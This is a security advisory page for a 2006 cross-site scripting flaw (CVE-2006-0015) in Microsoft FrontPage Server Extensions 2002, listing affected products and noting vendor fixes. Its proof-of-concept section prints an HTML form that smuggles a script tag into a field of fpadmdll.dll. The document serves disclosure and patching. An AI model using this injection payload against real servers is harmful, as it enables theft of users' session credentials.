Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability

BID:17452

Info

Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability

Bugtraq ID: 17452
Class: Input Validation Error
CVE: CVE-2006-0015
Remote: Yes
Local: No
Published: Apr 11 2006 12:00AM
Updated: Apr 13 2006 06:07PM
Credit: Esteban Martínez Fayó is credited with the discovery of this vulnerability.
Vulnerable: Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft SharePoint Team Services 2002
+ Microsoft Office XP SP1
 Microsoft FrontPage Server Extensions 2002
Not Vulnerable: Microsoft Windows SharePoint Services
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98
Microsoft FrontPage Server Extensions 2000
+ Microsoft Windows 2000 Advanced Server SP3
 + Microsoft Windows 2000 Advanced Server SP2
 + Microsoft Windows 2000 Advanced Server SP1
 + Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server SP3
 + Microsoft Windows 2000 Datacenter Server SP2
 + Microsoft Windows 2000 Datacenter Server SP1
 + Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Professional SP3
 + Microsoft Windows 2000 Professional SP2
 + Microsoft Windows 2000 Professional SP1
 + Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Server SP3
 + Microsoft Windows 2000 Server SP2
 + Microsoft Windows 2000 Server SP1
 + Microsoft Windows 2000 Server
+ Microsoft Windows XP Home SP1
 + Microsoft Windows XP Home
+ Microsoft Windows XP Professional SP1
 + Microsoft Windows XP Professional
Microsoft FrontPage 2002
+ Microsoft Office XP
- Microsoft Windows 2000 Professional SP2
 - Microsoft Windows 2000 Professional SP1
 - Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows NT Workstation 4.0 SP6a
 - Microsoft Windows NT Workstation 4.0 SP6
 - Microsoft Windows NT Workstation 4.0 SP5
 - Microsoft Windows NT Workstation 4.0 SP4
 - Microsoft Windows NT Workstation 4.0 SP3
 - Microsoft Windows NT Workstation 4.0 SP2
 - Microsoft Windows NT Workstation 4.0 SP1
 - Microsoft Windows NT Workstation 4.0
 - Microsoft Windows XP Home
- Microsoft Windows XP Professional

Discussion

Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability

Microsoft FrontPage Server Extensions are prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before it is rendered to other users.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user, with the privileges of the victim userâ??s account. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Exploit / POC

Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability

This issue can be exploited through a web client.

An example HTML form demonstrating this issue is availble:

<form action=http://www.example.com/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
<input type="hidden" name="operation" value="--><script>alert()</script>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>

Solution / Fix

Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability

Solution:

The vendor has released fixes to address this issue; please see the reference section for further details.


Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows Server 2003 Enterprise Edition Itanium SP1

Microsoft SharePoint Team Services 2002

Microsoft FrontPage Server Extensions 2002

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows XP Professional SP2

Microsoft Windows Server 2003 Standard x64 Edition

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows XP Home SP2

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

References

Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report